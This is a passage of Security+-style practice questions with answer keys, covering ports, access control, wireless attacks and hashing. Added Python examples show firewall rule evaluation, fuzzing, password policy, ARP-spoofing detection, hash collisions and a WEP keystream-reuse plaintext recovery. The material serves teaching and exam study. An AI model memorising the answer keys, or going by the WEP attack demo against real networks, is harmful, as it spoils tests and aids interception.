C.netstat Correct Answer: netstat is a tool found on both Unix/Linux and Windows hosts that gives network statistics and connection information, including listening ports (for example netstat -an, or netstat -tulpn on Linux to include the owning process). This would help determine whether a host is listening on an unexpected or unwanted port. On current Linux systems ss provides the same information and is often installed where netstat is not. Incorrect Answers: None of the other choices give information on open ports. B.nbtstat is a command found only on Windows hosts and gives NetBIOS usage information. D.ping is found on both Unix/Linux and Windows hosts but only sends simple ICMP echo requests to a host. A.ifconfig is found only on Unix and Linux hosts and only gives network interface configuration information.
What is the security term for disabling unnecessary services on a system and uninstalling unnecessary software? A.System hardening B.Network hardening C.System reduction D.Application restriction
A. System hardening System hardening involves disabling unnecessary services and protocols on a host, as well as uninstalling software that is not needed, reducing the host's attack surface. Incorrect Answers: B, C & D.Network hardening, system reduction, and application restriction are nonexistent terms in this context, used as distractors.
You are troubleshooting a communication issue on the network. Which of the following protocols is responsible for converting the IP address to a MAC address? A.ARP B.DNS C.RARP D.DHCP
A.ARP Address Resolution Protocol (ARP) resolves IP addresses to MAC addresses on the local network segment. Incorrect Answers: C.RARP, the Reverse Address Resolution Protocol, resolves MAC addresses to IP addresses, the exact opposite of ARP. B.DNS, the Domain Name System, resolves fully qualified domain names (FQDNs) to IP addresses. D.DHCP, the Dynamic Host Configuration Protocol, dynamically issues IP addressing information to hosts.
Which of the following identifies a security reason to perform a site survey to identify rogue access points? A.Bypass security controls B.Frequency overlap C.Interference D.Signal propagation
A.Bypass security controls Rogue access points could be used by unauthorized individuals to reach the internal network directly, bypassing security controls such as firewalls and NAC that sit at the normal points of entry. Incorrect Answers: B, C & D.These issues may affect performance and can matter to an RF design, but they do not directly affect the security of the wireless network.
Which of the following is used to identify certificates that are no longer valid for use? A.CRL B.CAL C.CA D.PKS
A.CRL The certificate revocation list (CRL) is used to identify certificates that have been revoked before their expiration date. Incorrect Answers: B.A CAL is a client access license. D.PKS is a distractor (the real term is PKCS, the Public-Key Cryptography Standards). C.A CA is a certificate authority, which issues certificates.
Which of the following goals of information security deals with identifying modifications to data? A.Integrity B.Availability C.Nonrepudiation D.Confidentiality
A.Integrity Integrity provides for detection of data modification. Incorrect Answers: D.Confidentiality deals with protecting data from unauthorized access, not modification. B.Availability ensures data and systems are available to authorized users whenever needed. C.Nonrepudiation involves preventing a user from denying that he or she performed an action.
All of the following are potential application security issues requiring attention EXCEPT: A.SQL injection B.Buffer overflows C.Cross-site scripting D.Malware
D. Malware Malware is a security issue, but not specific to any applications. Incorrect Answers: All of these are potential application security issues that could affect both web-based and client-server applications.
Administrators who grant access to resources by placing users in groups are using which type of access control model? A.Role-based access control B.Discretionary access control C.Mandatory access control D.Rule-based access control
A.Role-based access control Role-based access control grants access to groups performing specific functions, or roles, but not to individuals. Incorrect Answers: B.Discretionary access control allows data owners/creators to grant access to individuals or groups. C.Mandatory access control permits only administrators to grant access, based upon security labels. D.Rule-based access control grants access to resources based upon specific rules associated with the resource.
The network administrator for your office has configured the company web site for SSL by applying a certificate to the site. What port will you need to open on the firewall to allow communication to the site? A.80 B.22 C.53 D.443
D.443 TCP port 443 must be opened on the firewall to allow SSL/TLS traffic (HTTPS) to pass. Incorrect Answers: A.Port 80 is plain HTTP, B.port 22 is SSH and C.port 53 is DNS; none of them carries SSL.
You are configuring IPSec on your network and need to allow for security association (SA) traffic to pass through the firewall. Which of the following ports does the Internet Key Exchange (IKE) protocol, which is the protocol responsible for the SA setup within IPSec, use? A.443 B.22 C.8080 D.500
D.500 IKE uses UDP port 500. Note that opening UDP 500 alone is not enough for a working tunnel: when either peer is behind NAT, IKE and the encapsulated traffic move to UDP port 4500 (NAT-T), and without NAT the protected traffic itself is ESP (IP protocol 50) or AH (IP protocol 51), which are not TCP or UDP ports at all. Incorrect Answers: A.Port 443 is used by SSL. B.Port 22 is used by SSH. C.Port 8080 does not fall into the range of well-known ports (0-1023) but is frequently used by proxy servers and other security devices.
Which of the following statements best describes the concept of "implicit deny"? A.Anything that is not specifically denied is specifically allowed. B.Anything that is not specifically denied is allowed by default. C.Anything that is not specifically allowed is specifically denied. D.Anything that is not specifically allowed is denied by default.
D.Anything that is not specifically allowed is denied by default. Anything that is not specified as allowed is denied without any deny rule being needed: it is implicitly denied rather than explicitly denied. Incorrect Answers: A describes an explicit allow, B an implicit allow (default permit), and C an explicit deny.
A "deny any-any" rule in a firewall ruleset is normally placed: A.Nowhere in the ruleset if it has a default allow policy. B.At the top of the ruleset. C.Below the last allow rule, but above the first deny rule in the ruleset. D.At the bottom of the ruleset.
D.At the bottom of the ruleset. A "deny any-any" rule matches all traffic from every source to every destination, so in a first-match ruleset it must be the last rule, where it turns the implicit deny into an explicit (and typically logged) one. Incorrect Answers: Placing the "deny any-any" rule anywhere else would prevent every rule below it from ever matching, because rules are evaluated top-down and the first match wins.
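The two questions above describe first-match evaluation, the implicit deny that applies when nothing matches, and what goes wrong when "deny any-any" is not last. The following Python is an added illustration, not part of the practice test: the rule and packet formats are constructed for the example, but the evaluation order and the shadowing check mirror how most packet filters behave.

```python
"""First-match firewall rule evaluation with an implicit deny.

Added example (not from the practice test). Rule and packet formats are
constructed for illustration; real firewalls differ in syntax but most
evaluate top-down, first match wins, and fall through to an implicit deny.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    src: str               # CIDR or "any"
    dst: str               # CIDR or "any"
    proto: str             # "tcp", "udp" or "any"
    dport: Optional[int]   # destination port, None matches every port

    @staticmethod
    def _net(spec: str):
        return ip_network("0.0.0.0/0") if spec == "any" else ip_network(spec)

    def matches(self, pkt: dict) -> bool:
        """True if this rule applies to the packet (a dict with src, dst, proto, dport)."""
        return (ip_address(pkt["src"]) in self._net(self.src)
                and ip_address(pkt["dst"]) in self._net(self.dst)
                and self.proto in ("any", pkt["proto"])
                and self.dport in (None, pkt["dport"]))

    def covers(self, other: "Rule") -> bool:
        """True if every packet matched by `other` is also matched by this rule."""
        return (self._net(other.src).subnet_of(self._net(self.src))
                and self._net(other.dst).subnet_of(self._net(self.dst))
                and self.proto in ("any", other.proto)
                and self.dport in (None, other.dport))


def evaluate(ruleset: List[Rule], pkt: dict) -> Tuple[str, Optional[int]]:
    """Walk the ruleset top-down; return (action, index) of the first match.

    When nothing matches, the implicit deny applies and the index is None:
    no explicit deny rule was needed to reject the packet.
    """
    for i, rule in enumerate(ruleset):
        if rule.matches(pkt):
            return rule.action, i
    return "deny", None


def shadowed_rules(ruleset: List[Rule]) -> List[int]:
    """Indexes of rules that can never fire because an earlier rule covers them.

    A 'deny any-any' placed anywhere but last shadows everything below it.
    """
    shadowed = []
    for i, later in enumerate(ruleset):
        if any(earlier.covers(later) for earlier in ruleset[:i]):
            shadowed.append(i)
    return shadowed


# Constructed ruleset: a web server, SSH from the internal range, then deny-all.
ALLOW_HTTPS = Rule("allow", "any", "10.0.0.5/32", "tcp", 443)
ALLOW_SSH = Rule("allow", "10.0.0.0/8", "10.0.0.5/32", "tcp", 22)
DENY_ALL = Rule("deny", "any", "any", "any", None)
GOOD_RULESET = [ALLOW_HTTPS, ALLOW_SSH, DENY_ALL]
BAD_RULESET = [DENY_ALL, ALLOW_HTTPS, ALLOW_SSH]   # deny any-any at the top

WEB_PKT = {"src": "203.0.113.7", "dst": "10.0.0.5", "proto": "tcp", "dport": 443}
SSH_PKT = {"src": "203.0.113.7", "dst": "10.0.0.5", "proto": "tcp", "dport": 22}

if __name__ == "__main__":
    print(evaluate(GOOD_RULESET, WEB_PKT))        # ('allow', 0)
    print(evaluate(GOOD_RULESET, SSH_PKT))        # ('deny', 2)  explicit deny-all fired
    print(evaluate(GOOD_RULESET[:2], SSH_PKT))    # ('deny', None)  implicit deny
    print(shadowed_rules(BAD_RULESET))            # [1, 2]  both allows are dead rules
```

The only behavioural difference between the two deny outcomes is the index: an explicit deny-all gives the administrator a rule to attach logging to, while the implicit deny happens silently. `shadowed_rules` is the check to run before deploying a ruleset; a misplaced broad rule, deny or allow, shows up as rules below it that can never match.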
Which of the following wireless attacks specifically attempts to take control of or use Bluetooth-enabled cell phones to make unauthorized calls? A.Bluesniffing B.Bluejacking C.Bluesnarfing D.Bluebugging
D.Bluebugging Bluebugging, the most serious of the listed Bluetooth attacks, involves an attacker taking control of a Bluetooth-enabled phone to place calls, send messages or listen in on conversations. Incorrect Answers: B.Bluejacking is the act of sending unsolicited messages or files to a Bluetooth device. C.Bluesnarfing is more serious than bluejacking and involves unauthorized access to information on a Bluetooth-enabled device. A.Bluesniffing is a distractor in this question.
Which of the following application attacks allows attackers to inject client-side script into web pages viewed by other users? A.SQL injection B.Buffer overflow C.XML injection D.Cross-site scripting
D.Cross-site scripting Cross-site scripting (XSS) enables attackers to inject client-side script into web pages viewed by other users, typically because user-supplied input is written into the page without output encoding. Incorrect Answers: C.XML injection occurs when malicious XML is inserted into an XML statement or document. A.SQL injection involves inserting crafted SQL into input that a site passes to its database, producing unintended results or returning privileged information. B.A buffer overflow takes advantage of a programming flaw in which data written past the end of an allocated buffer overwrites adjacent memory, which can allow arbitrary code to be executed.
Your manager has read a lot about server virtualization and is wondering if there are any security benefits to using server virtualization. How would you respond? A.Larger hardware footprint B.More work required to harden systems C.Decentralized server security D.Fewer systems to physically secure
D.Fewer systems to physically secure Virtualization consolidates workloads onto fewer physical systems (and less hardware) that must be secured. Note that consolidation also concentrates risk: a compromised hypervisor exposes every guest running on it, so the host itself must be hardened with particular care. Incorrect Answers: None of the other choices is a benefit of virtualization, security-related or otherwise.
Which of the following techniques involves sending unexpected or invalid data to an application to determine vulnerabilities? A.Cracking B.Spoofing C.Scanning D.Fuzzing
D.Fuzzing Fuzzing is an application vulnerability testing technique that sends invalid or unexpected data to the application, with the intent to see if any security vulnerabilities exist. Incorrect Answers: A.Cracking typically involves passwords, not applications. C.Scanning usually means network port or service scanning. B.Spoofing means to masquerade as another entity, usually by spoofing an IP address, MAC address, or user.
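A mutation fuzzer is short enough to show in full. The Python below is an added example, not part of the practice test: `parse_kv` is a constructed toy parser with two deliberate bugs, and `fuzz` feeds it randomly mutated variants of a valid seed and keeps one sample input per distinct unexpected exception. The one exception the parser is designed to raise (`ParseError`) is not counted as a finding; everything else is.

```python
"""Mutation fuzzing of a small parser.

Added example (not from the practice test). `parse_kv` is a constructed toy
parser with deliberate bugs; `fuzz` mutates a valid seed and records any
exception the parser did not raise on purpose.
"""
import random
from typing import Callable, Dict, Tuple


class ParseError(Exception):
    """The only exception parse_kv is *meant* to raise on bad input."""


def parse_kv(data: bytes) -> Dict[bytes, bytes]:
    """Parse b'<count>;k=v;k=v'. Constructed example with two bugs:
    the count is trusted (IndexError when it exceeds the pairs present) and
    every pair is assumed to contain '=' (ValueError from tuple unpacking).
    """
    head, _, body = data.partition(b";")
    if not head.isdigit():
        raise ParseError("count must be numeric")   # the intended rejection path
    count = int(head)
    pairs = body.split(b";")
    result = {}
    for i in range(count):
        key, value = pairs[i].split(b"=", 1)         # both bugs live on this line
        result[key] = value
    return result


def mutate(seed: bytes, rng: random.Random) -> bytes:
    """Apply one random mutation: flip a byte, delete, insert, truncate or duplicate."""
    data = bytearray(seed)
    op = rng.choice(["flip", "delete", "insert", "truncate", "dup"])
    if op == "flip" and data:
        data[rng.randrange(len(data))] = rng.randrange(256)
    elif op == "delete" and data:
        del data[rng.randrange(len(data))]
    elif op == "insert":
        data.insert(rng.randrange(len(data) + 1), rng.randrange(256))
    elif op == "truncate" and data:
        del data[rng.randrange(len(data)):]
    elif op == "dup":
        data += seed
    return bytes(data)


def fuzz(target: Callable[[bytes], object], seed: bytes,
         iterations: int = 2000, rng_seed: int = 1) -> Dict[Tuple[str, str], bytes]:
    """Run `target` on mutated inputs; return {(exception type, message): input}.

    ParseError is the parser's documented failure mode, so it is not a finding.
    Anything else is an unhandled crash worth triaging; one sample input is
    kept per distinct crash signature so the report stays readable.
    """
    rng = random.Random(rng_seed)                   # fixed seed: reproducible run
    crashes: Dict[Tuple[str, str], bytes] = {}
    for _ in range(iterations):
        case = mutate(seed, rng)
        try:
            target(case)
        except ParseError:
            continue
        except Exception as exc:                    # a fuzzer wants every other exception
            signature = (type(exc).__name__, str(exc)[:40])
            crashes.setdefault(signature, case)
    return crashes


SEED = b"2;user=bob;role=admin"   # constructed valid input

if __name__ == "__main__":
    for (exc_type, msg), sample in fuzz(parse_kv, SEED).items():
        print(f"{exc_type}: {msg!r} triggered by {sample!r}")
```

In a language such as Python the findings are uncaught exceptions; against a native parser the same loop would be watching for signals (segmentation faults) and memory-checker reports. The fixed random seed is deliberate: a crash that cannot be reproduced cannot be handed to a developer.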
When a user types his or her username into a logon screen, this is known as ___________? A.Authorization B.Authentication C.Impersonation D.Identification
D.Identification Identification is the first step in the process and involves the user presenting his or her claimed identity (the username) to the server. Incorrect Answers: B.Authentication occurs after identification and involves the user's credentials being verified by the server. A.Authorization refers to granting an authenticated user the correct access to an object. C.Impersonation is an invalid term in this context.
Which authentication technology makes use of a key distribution center composed of an authentication server and a ticket-granting service? A.Single sign-on B.RADIUS C.Sesame D.Kerberos
D.Kerberos Kerberos uses a key distribution center (KDC), which consists of an authentication server and a ticket-granting service. Incorrect Answers: None of these choices is associated with these terms.
Which of the following types of malware is designed to activate after a predetermined amount of time or upon a specific event or date? A.Rootkit B.Adware C.Trojan D.Logic bomb
D.Logic bomb Correct Answer: A logic bomb is a type of malware, usually very difficult to detect, that is designed to activate only after a specific time has passed or a specific date or event has occurred. Incorrect Answers: These other types of malware are not tied to specific dates or events.
Which type of cloud service is usually operated by a third-party provider that sells or rents "pieces" of the cloud to different entities, such as small businesses or large corporations, to use as they need? A.Private B.External C.Community D.Public
D.Public A public cloud is operated by a third-party provider who leases space in the cloud to anyone who needs it. Incorrect Answers: B.An external cloud is not a valid type of cloud and could be a public, private, or community cloud. A.A private cloud is for use only by one organization and is usually hosted on that organization's own infrastructure. C.A community cloud is for use by similar organizations or communities, such as universities or hospitals, that need to share common data.
Which of the following best describes a minimum password age setting? A.Users must change passwords after a certain amount of time. B.Users must not change passwords until a certain date. C.Passwords cannot be reused until they have been expired a certain amount of time. D.Users must wait a certain amount of time before they are allowed to change passwords.
D.Users must wait a certain amount of time before they are allowed to change passwords. A minimum password age requires that users must wait a certain amount of time before they are allowed to change passwords. Incorrect Answers: A.A maximum password age setting requires that users must change passwords after a certain amount of time. B.Passwords are typically good only for a certain amount of time, not through a certain date. C.Passwords typically cannot be reused until a certain number of password changes have occurred, preventing the use of the last specified number of passwords.
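The three age and history settings above only make sense together, and the reason minimum age exists is easy to miss: without it, a user can make N+1 changes in a minute and land straight back on the old password, defeating the history. The Python below is an added illustration, not part of the practice test; days are passed in as integers so the behaviour can be checked without a clock, and the PBKDF2 hashing with a single per-account salt is an assumption standing in for whatever verifier a real directory uses.

```python
"""Enforcing minimum age, maximum age and password history together.

Added example (not from the practice test). Days are plain integers so the
policy can be exercised without a clock; PBKDF2 and the per-account salt are
assumptions standing in for the real directory's password verifier.
"""
import hashlib
import hmac
import os
from collections import deque
from typing import Deque, Optional, Tuple


def _hash(password: str, salt: bytes) -> bytes:
    # One salt per account (not per entry) so old hashes stay comparable.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class PasswordPolicy:
    def __init__(self, min_age_days: int = 1, max_age_days: int = 90, history: int = 5):
        self.min_age_days = min_age_days      # wait this long before changing again
        self.max_age_days = max_age_days      # must change once this has elapsed
        self.history_size = history           # last N passwords cannot be reused


class Account:
    def __init__(self, policy: PasswordPolicy, password: str, day: int):
        self.policy = policy
        self.salt = os.urandom(16)
        self.history: Deque[bytes] = deque(maxlen=policy.history_size)
        self.current = _hash(password, self.salt)
        self.history.append(self.current)
        self.last_change_day = day

    def _in_history(self, password: str) -> bool:
        candidate = _hash(password, self.salt)
        return any(hmac.compare_digest(candidate, old) for old in self.history)

    def expired(self, day: int) -> bool:
        """Maximum age: True once the password is old enough that a change is required."""
        return day - self.last_change_day >= self.policy.max_age_days

    def change_password(self, new_password: str, day: int) -> Tuple[bool, Optional[str]]:
        """Return (accepted, reason). Minimum age is checked first, then history."""
        if day - self.last_change_day < self.policy.min_age_days:
            return False, "minimum password age not reached"
        if self._in_history(new_password):
            return False, "password was used recently"
        self.current = _hash(new_password, self.salt)
        self.history.append(self.current)   # deque drops the oldest entry beyond the limit
        self.last_change_day = day
        return True, None


if __name__ == "__main__":
    policy = PasswordPolicy(min_age_days=1, max_age_days=90, history=3)
    acct = Account(policy, "Spring2024!", day=0)
    print(acct.change_password("Summer2024!", day=0))   # refused: minimum age
    print(acct.change_password("Spring2024!", day=1))   # refused: in history
    print(acct.change_password("Summer2024!", day=1))   # accepted
```

With a history of three and a minimum age of one day, cycling back to the original password takes at least three days instead of three minutes, which is the whole point of combining the two settings. Administrators who need to reset a password on the same day typically exempt the administrative reset path from the minimum-age check rather than lowering the setting for everyone.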
The hacker has managed to modify the cache on the system that stores the IP address and corresponding MAC address with inappropriate entries. What type of attack has occurred? A.DHCP poisoning B.ARP poisoning C.DNS poisoning D.VLAN poisoning
B.ARP poisoning ARP poisoning involves introducing false entries into the host's ARP cache, essentially spoofing MAC addresses. Incorrect Answers: C.DNS poisoning involves introducing false entries into a DNS server's cache or its zone files. A&D.DHCP and VLAN poisoning are invalid answers.
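ARP has no authentication, so the only defence apart from switch features such as dynamic ARP inspection is to watch the replies. The Python below is an added example, not part of the practice test: the log lines are constructed to resemble `tcpdump -n arp` output, and the detector flags two things an ARP poisoner produces, an IP whose MAC binding changes and a single MAC that answers for more than one IP (the attacker impersonating both the gateway and the victim).

```python
"""Detecting ARP cache poisoning from captured ARP replies.

Added example (not from the practice test). The log lines are constructed to
resemble `tcpdump -n arp` output; the detector keeps the first IP-to-MAC
binding seen and flags later replies that change it, plus any MAC that
answers for more than one IP.
"""
import re
from typing import Dict, List, Set

REPLY_RE = re.compile(r"Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})")

# Constructed sample: the gateway 192.168.1.1 is legitimately at ...:01, then a
# host at ...:99 starts claiming both the gateway and the victim 192.168.1.10.
SAMPLE_LOG = """\
12:00:01.000 ARP, Request who-has 192.168.1.1 tell 192.168.1.10, length 28
12:00:01.001 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
12:00:02.000 ARP, Reply 192.168.1.10 is-at 00:11:22:33:44:10, length 28
12:00:05.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:99, length 28
12:00:05.100 ARP, Reply 192.168.1.10 is-at 00:11:22:33:44:99, length 28
12:00:06.000 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28
"""


def detect_arp_spoofing(lines: List[str]) -> List[str]:
    """Return alert strings for changed bindings and MACs claiming several IPs."""
    bindings: Dict[str, str] = {}        # ip -> first MAC seen for it
    claims: Dict[str, Set[str]] = {}     # mac -> IPs it has answered for
    alerts: List[str] = []
    for line in lines:
        m = REPLY_RE.search(line)
        if not m:
            continue                     # requests and non-ARP lines carry no binding
        ip, mac = m.group(1), m.group(2).lower()
        known = bindings.setdefault(ip, mac)
        if known != mac:
            alerts.append(f"binding change: {ip} was {known}, now {mac}")
        ips = claims.setdefault(mac, set())
        ips.add(ip)
        if len(ips) == 2:                # fire once, when the second IP appears
            alerts.append(f"mac {mac} answers for multiple IPs: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_LOG.splitlines()):
        print(alert)
```

Both signatures also fire on legitimate events: a replaced network card, a DHCP lease moving to another host, or a first-hop redundancy protocol failing over to a virtual MAC. In production the alerts should be correlated against DHCP leases and the known gateway MAC before anyone is paged, and the gateway binding is the one worth pinning statically on critical hosts.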
All of the following are considered secure application development practices EXCEPT: A.Memory management B.Back doors C.Error and exception handling D.Input validation
B.Back doors Back doors are a security risk due to the possibility that an attacker could use them to gain unauthorized access to the program. Incorrect Answers: All of these are considered secure coding and application development practices.
When users connect to the wireless network, management wants them to receive a message asking them to agree to the terms of use before being granted wireless network access. What network service could be used to perform this goal? A.Multifactor authentication B.Kerberos C.NAC D.PKI
C.NAC Network access control (NAC) can be used to enforce logon or connection banners (a captive portal) that require users to agree to terms of use before being allowed onto the network. Incorrect Answers: None of the other technologies listed is used to present and enforce acceptance of terms of use before network access is granted.
Which of the wireless encryption protocols uses the RC4 symmetric algorithm for encrypting wireless communication? A.TLS B.WEP C.WPA2 D.EAP
B.WEP WEP (Wired Equivalent Privacy) encrypts frames with the RC4 stream cipher, keyed with a 24-bit initialization vector prepended to the shared secret. The IV space is so small that IVs repeat quickly on a busy network, and a repeated IV reuses the keystream, which lets an attacker recover traffic and ultimately the key itself; WEP is therefore insecure and should never be used. Incorrect Answers: None of the other protocols listed is defined by RC4: WPA2 uses AES-CCMP, and TLS and EAP are not wireless encryption protocols at all (TLS once offered RC4 cipher suites, but they have been prohibited since 2015).
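The keystream-reuse flaw is concrete enough to demonstrate in a few lines. The Python below is an added example, not part of the practice test: it contains a textbook RC4 implementation and a constructed WEP-style keying (IV || secret), not the real WEP frame format, and shows that two frames sharing an IV let an attacker who knows one plaintext read the other without ever learning the key.

```python
"""Why RC4 with a reused 24-bit IV breaks WEP.

Added example (not from the practice test). Textbook RC4 plus a constructed
WEP-style keying of IV || secret; this is not the WEP frame format, it only
shows the keystream-reuse flaw.
"""
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Generate `length` bytes of RC4 keystream (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                               # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                            # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is a stream cipher: encryption and decryption are the same XOR."""
    return xor(data, rc4_keystream(key, len(data)))


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style keying: the per-frame RC4 key is the 24-bit IV prepended to the secret."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    return iv + rc4(iv + secret, plaintext)            # IV is sent in the clear


def recover_with_known_plaintext(frame1: bytes, plaintext1: bytes, frame2: bytes) -> bytes:
    """Given two frames sharing an IV and the plaintext of the first, recover the second.

    Same IV and same secret means the same keystream, so c1 XOR c2 = p1 XOR p2
    and a known p1 yields p2 directly; the secret key is never needed.
    """
    iv1, c1 = frame1[:3], frame1[3:]
    iv2, c2 = frame2[:3], frame2[3:]
    if iv1 != iv2:
        raise ValueError("frames use different IVs; keystreams differ")
    keystream = xor(c1, plaintext1)
    return xor(c2, keystream)


def expected_frames_until_iv_reuse(iv_bits: int = 24) -> float:
    """Birthday bound: an IV collision is expected after about sqrt(pi/2 * 2^bits) frames."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


SECRET = bytes.fromhex("0102030405")                   # constructed 40-bit WEP key
IV = b"\x01\x02\x03"
FRAME_A = wep_encrypt(SECRET, IV, b"GET /index.html ")   # attacker knows this plaintext
FRAME_B = wep_encrypt(SECRET, IV, b"passwd=hunter2!!")   # same IV, plaintext unknown

if __name__ == "__main__":
    print(recover_with_known_plaintext(FRAME_A, b"GET /index.html ", FRAME_B))
    print(round(expected_frames_until_iv_reuse()))    # roughly 5100 frames
```

Even with random IV selection a collision is expected after only about five thousand frames, and many WEP cards simply counted up from zero, so reuse was immediate after a reboot. Known plaintext is plentiful on a network (protocol headers, DHCP and ARP exchanges), which is why this attack needed no key recovery at all; the later FMS and related statistical attacks went further and recovered the secret from the weak IVs the answer mentions.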
You have an Internet-facing web server that only serves static web pages to users. Recently you have discovered that someone has been using your server as a mail relay. Which service and port should you remove to stop this type of attack? A.SMTP, port 110 B.HTTP, port 80 C.SMTP, port 25 D.HTTP, port 443
C.SMTP, port 25 Simple Mail Transfer Protocol (SMTP) uses TCP port 25 to send e-mail and should not be running on an Internet-facing server that only provides a web site; removing the service (and closing the port) stops the relay abuse. Incorrect Answers: B.HTTP (port 80) must remain so the server can serve its pages. A.SMTP uses port 25, not port 110; port 110 is used by POP3 to retrieve e-mail. D.Port 443 is HTTPS, not HTTP, and is in any case not the service being abused.
What is the term used when two different pieces of data generate the same hash value? A.Crossover error B.Disruption C.Collision D.Interference
C.Collision A collision occurs when two different inputs produce the same hash value. Because a digest is shorter than its inputs, collisions must exist; a secure hash function makes them infeasible to find, and the birthday bound means an n-bit digest resists a collision search only up to roughly 2^(n/2) work. Incorrect Answers: A.A crossover error (rate) is a biometric authentication metric. D.Interference refers to wireless networks. B.Disruption is an invalid term in this context.
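The birthday bound is easier to believe once it has been run. The Python below is an added example, not part of the practice test: SHA-256 itself has no known collisions, so the digest is truncated to a few bits to make the effect visible, but the search technique (store every digest seen, stop at the first repeat) and the estimate of how long it takes are the general ones.

```python
"""Finding a hash collision with a birthday search.

Added example (not from the practice test). SHA-256 has no known collisions,
so the digest is truncated to make the effect visible; the search and the
birthday-bound estimate are the general technique.
"""
import hashlib
import math
from typing import Dict, Tuple


def truncated_hash(data: bytes, bits: int) -> int:
    """Leading `bits` bits of SHA-256(data) as an integer."""
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return digest >> (256 - bits)


def find_collision(bits: int = 32) -> Tuple[bytes, bytes, int]:
    """Hash distinct messages until two share a truncated digest.

    Returns (m1, m2, attempts). Keeping every digest seen trades memory for
    time: expected attempts are about sqrt(pi/2 * 2^bits), not 2^bits.
    """
    seen: Dict[int, bytes] = {}
    attempts = 0
    while True:
        msg = b"msg-%d" % attempts               # constructed message series
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, attempts + 1
        seen[h] = msg
        attempts += 1


def expected_attempts(bits: int) -> float:
    """Birthday bound for a `bits`-bit digest."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


if __name__ == "__main__":
    m1, m2, n = find_collision(32)
    print(m1, m2, n, truncated_hash(m1, 32) == truncated_hash(m2, 32))
    print(round(expected_attempts(32)))   # about 82,000, against 2^32 for brute force
```

Scale the same arithmetic up and the security margins of real digests fall out: a 128-bit digest such as MD5 would resist this generic search to about 2^64 work even if it were otherwise perfect, which is why 256-bit digests are the floor for new designs, and why the structural attacks that broke MD5 and SHA-1 (collisions in far fewer than 2^64 and 2^80 operations respectively) retired them from signing.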
An attack in which an attacker attempts to disconnect a victim's wireless host from its access point is called a(n) __________. A.Replay attack B.Spoofing C.Deauthentication attack D.Initialization vector attack
C.Deauthentication attack A deauthentication attack sends forged 802.11 deauthentication management frames, spoofed to appear to come from the access point or the client, to make the two disconnect from each other; it is used both as a denial of service and to force a reconnection that can be captured. Incorrect Answers: B.A spoofing attack involves impersonating a wireless client or access point, either through its IP or MAC address. A.A replay attack involves the reuse of intercepted credentials or messages to gain access to a system or network. D.Initialization vector (IV) attacks involve attempting to break WEP keys by targeting their weak IVs.
Which of the following security controls is designed to prevent tailgating? A.Least privilege B.Multifactor authentication C.Mantrap D.Separation of duties
C.Mantrap A mantrap, an area between two locked doors from which the second door cannot be opened until the first door is locked, is designed to allow only one person at a time to enter a facility, effectively preventing tailgating. Incorrect Answers: A&D.Separation of duties and least privilege are two security principles designed to prevent collusion and elevated privileges, respectively. B.Multifactor authentication is designed to positively identify and authenticate an individual but does not prevent tailgating.
A term used to identify an authentication scheme that involves both sides of the communication authenticating is: A.Hashing B.Single sign-on C.Mutual authentication D.Nonrepudiation
C.Mutual authentication Correct Answer: Mutual authentication requires both sides of a communications session to authenticate to each other. Incorrect Answers: B.Single sign-on (SSO) is a concept that provides for one authentication to be used for multiple resources. D.Nonrepudiation ensures that a party cannot deny that it took an action. A.Hashing involves a one-way function that produces a message digest from a piece of text.
Bob logs on to the network and receives a message indicating that patches are not up to date and that he cannot be granted access to the network until patches are updated. What network feature is responsible for the message? A.NAT B.VPN C.NAC D.TPM
C.NAC Correct Answer: Network access control (NAC) can be used to prevent hosts from connecting to the network unless they meet certain security requirements, such as patch level, up-to-date antivirus signatures, and so forth. Incorrect Answers: None of these other technologies are concerned with enforcing host security requirements prior to connecting to the network.
Which device, when implemented with VLANs, can help reduce both collision and the size of broadcast domains? A.Router B.Bridge C.Hub D.Switch
D.Switch Switches natively help reduce collision domains and, when VLANs are implemented on them, help reduce broadcast domains. Incorrect Answers: A&B.Routers can help reduce or eliminate broadcast domains, and bridges can help reduce collision domains, but neither of these devices use VLANs. C.Hubs do not reduce collision or broadcast domains.
Which of the following terms refers to the practices of stealing or obtaining a user's personal or account information, typically using voice over IP (VoIP) systems? A.VoIP B.Whaling C.Phishing D.Vishing
D.Vishing Vishing (a combination of the terms voice and phishing) refers to social engineering attacks that make use of VoIP systems to spoof phone numbers, hide caller IDs, and so forth, to obtain personal or account information from unsuspecting users. Incorrect Answers: C.Phishing involves e-mail sent to users with a malicious web site link embedded in the message. B.Whaling involves specifically targeting senior-level executives of an organization for social engineering attacks. A.VoIP is the technology the attack abuses, not the name of an attack.
Which type of assessment is used to determine weaknesses within a system? A.Penetration test B.Risk assessment C.Threat assessment D.Vulnerability assessment
D.Vulnerability assessment A vulnerability assessment looks for weaknesses in systems. Incorrect Answers: C.A threat assessment looks at events that could exploit vulnerabilities. B.A risk assessment is a combination of assessments and is designed to assess factors, including likelihood and impact, that affect an asset. A.A penetration test actually attempts to exploit any found weaknesses (usually after a vulnerability assessment) to gain access to systems.
